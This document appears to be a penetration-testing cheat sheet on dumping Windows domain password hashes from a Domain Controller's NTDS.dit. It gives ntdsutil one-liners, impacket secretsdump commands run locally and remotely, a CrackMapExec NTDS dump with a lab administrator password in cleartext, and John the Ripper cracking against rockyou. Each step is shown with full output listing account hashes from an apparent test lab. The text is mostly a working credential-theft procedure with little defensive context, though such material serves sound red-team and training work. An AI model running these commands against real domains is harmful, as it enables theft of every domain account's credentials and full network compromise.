=================================================================================================================================================
Dumping Windows credentials (domain password hashes)
=================================================================================================================================================

The objective is to extract the password hashes of all the domain accounts that are stored in the NTDS.dit file of a Domain Controller.
A valid domain account member of the 'Domain admins' group or 'Backup Operator' group or the 'Administrators' group of the Domain Controller
is required to dump the NTDS.dit file and the registry hive 'hklm\system'.


=================================================================================================================================================
Example 1. Dumping Windows domain password hashes
   => Targets: NDTDS.dit, registry hive 'SYSTEM'
   => Tools: NTDSUTIL + Secretsdump
=================================================================================================================================================

1. Ntdsutil
-------------
The ntdsutil snapshot facility (introduced in Windows Server 2008) can create a snapshot of the active directory database.
It allows to copy the ntds.dit and SYSTEM files.

> Step by step commands:
	C:\>ntdsutil
	activate instance ntds
	ifm
	create full c:\NTDS_saved
	quit
	quit
	
OR

> One-liner: powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"

OR

> One-liner: Ps C:\> ntdsutil.exe "ac i ntds" "ifm" "create full c:\temp" quit quit


2 Secretsdump (impacket)
---------------------------
The impacket secretsdump module can be used to perform various tasks including extraction of contents of the NTDS file. 
It requires the registry hive "SYSTEM" and the NTDS.dit database file.

$ python3 secretsdump.py -ntds ntds.dit -system system.hive -user-status LOCAL

Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Target system bootKey: 0x941140bd825386b732031d5c5b01ae8a
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: b175740e0908fe396a15b0dc5631e72a
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a558c1aa1212fb2dd8940d149b51c6b::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
backup:1008:aad3b435b51404eeaad3b435b51404ee:1d6fcbd306077d663e23775e55b3f2e5::: (status=Enabled)
TEMP-DC$:1009:aad3b435b51404eeaad3b435b51404ee:cf8e5ee10c7615bc73f4b2511e09cf19::: (status=Enabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:208ae4a2c5aa7b40d0473499408a2670::: (status=Disabled)
Security-Test-Lab.Local\EDUARDO_MAXWELL:1112:aad3b435b51404eeaad3b435b51404ee:63897a6fb3ac955b0ec847786bfa9d23::: (status=Enabled)
Security-Test-Lab.Local\INES_TILLMAN:1113:aad3b435b51404eeaad3b435b51404ee:70d56a72e9cacdc6df36d990adb3b073::: (status=Enabled)
<SNIP>
  

=================================================================================================================================================
Example 2. Dump remotely domain password hashes
   => Targets: NDTDS.dit, registry hive 'SYSTEM'
   => Tool: Secretsdump (impacket) or CrackMapExec
=================================================================================================================================================

There are 2 methods with secretsdump.py to remotely dump the domain password hashes (NTDS.DIT)
=> drsuapi - Uses drsuapi RPC interface create a handle, trigger replication, and combined with additional drsuapi calls to convert the resultant linked-lists into readable format  
=> vss 	   - Uses the Volume Shadow copy Service  

$ python3 secretsdump.py -just-dc-ntlm -user-status -use-vss -exec-method wmiexec qualys@192.168.1.50
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
Password:
[*] Target system bootKey: 0x941140bd825386b732031d5c5b01ae8a
[*] Searching for NTDS.dit
[*] Registry says NTDS.dit is at C:\Windows\NTDS\ntds.dit. Calling vssadmin to get a copy. This might take some time
[*] Using wmiexec method for remote execution
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: b175740e0908fe396a15b0dc5631e72a
[*] Reading and decrypting hashes from \\192.168.1.50\ADMIN$\Temp\btprVJMN.tmp 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:7a558c1aa1212fb2dd8940d149b51c6b::: (status=Enabled)
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: (status=Disabled)
backup:1008:aad3b435b51404eeaad3b435b51404ee:1d6fcbd306077d663e23775e55b3f2e5::: (status=Enabled)
TEMP-DC$:1009:aad3b435b51404eeaad3b435b51404ee:cf8e5ee10c7615bc73f4b2511e09cf19::: (status=Enabled)
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:208ae4a2c5aa7b40d0473499408a2670::: (status=Disabled)
Security-Test-Lab.Local\EDUARDO_MAXWELL:1112:aad3b435b51404eeaad3b435b51404ee:63897a6fb3ac955b0ec847786bfa9d23::: (status=Enabled)
Security-Test-Lab.Local\INES_TILLMAN:1113:aad3b435b51404eeaad3b435b51404ee:70d56a72e9cacdc6df36d990adb3b073::: (status=Enabled)
<SNIP>
Security-Test-Lab.Local\batch-prod:6101:aad3b435b51404eeaad3b435b51404ee:49de316d55d2ef98db702e743538a291::: (status=Enabled)
[*] Cleaning up...

--------

jeff@kali:~/Documents/CTFs/BadBlood$ crackmapexec smb 192.168.1.50 -u Administrator -p Test123456 --ntds vss > crackmap-NTDS-vss-dump.txt

jeff@kali:~/Documents/CTFs/BadBlood$ more crackmap-NTDS-vss-dump.txt
SMB         192.168.1.50    445    TEMP-DC          [*] Windows Server 2012 R2 Standard 9600 x64 (name:TEMP-DC) (domain:SECURITY-LAB) (signing:True) (SMBv1:True)
SMB         192.168.1.50    445    TEMP-DC          [+] SECURITY-LAB\Administrator:Test123456 (Pwn3d!)
SMB         192.168.1.50    445    TEMP-DC          [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         192.168.1.50    445    TEMP-DC          Administrator:500:aad3b435b51404eeaad3b435b51404ee:a134f40245c97f246e054cd56207eb28:::
SMB         192.168.1.50    445    TEMP-DC          Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         192.168.1.50    445    TEMP-DC          krbtgt:502:aad3b435b51404eeaad3b435b51404ee:208ae4a2c5aa7b40d047<SNIP>
SMB         192.168.1.50    445    TEMP-DC          backup:1008:aad3b435b51404eeaad3b435b51404ee:b9e0cfceaf6d077970306a2fd88a7c0a:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\EDUARDO_MAXWELL:1112:aad3b435b51404eeaad3b435b51404ee:63897a6fb3ac955b0ec847786bfa9d23:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\INES_TILLMAN:1113:aad3b435b51404eeaad3b435b51404ee:70d56a72e9cacdc6df36d990adb3b073:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\BRIDGET_BALLARD:1114:aad3b435b51404eeaad3b435b51404ee:1d5651ad1e8f8ead2775cfded5c9934e:::
SMB         192.168.1.50    445    TEMP-DC          Security-Test-Lab.Local\RHONDA_EATON:1115:aad3b435b51404eeaad3b435b51404ee:4c64c4bfd6302278f5b989fc76a886b5:::
<SNIP>




=================================================================================================================================================
Other - Windows password cracking using John (JTR)
=================================================================================================================================================

jeff@kali:~/Documents/CTFs/BadBlood$ sudo john NTDS-extract.txt --rules=all --wordlist=/usr/share/wordlists/rockyou.txt --format=nt
Using default input encoding: UTF-8
Loaded 4392 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:45 DONE (2020-04-15 18:31) 0g/s 5170Kp/s 5170Kc/s 22808MC/s Aadamfamaylming..Aaaaaaaaaaaaing
Session completed
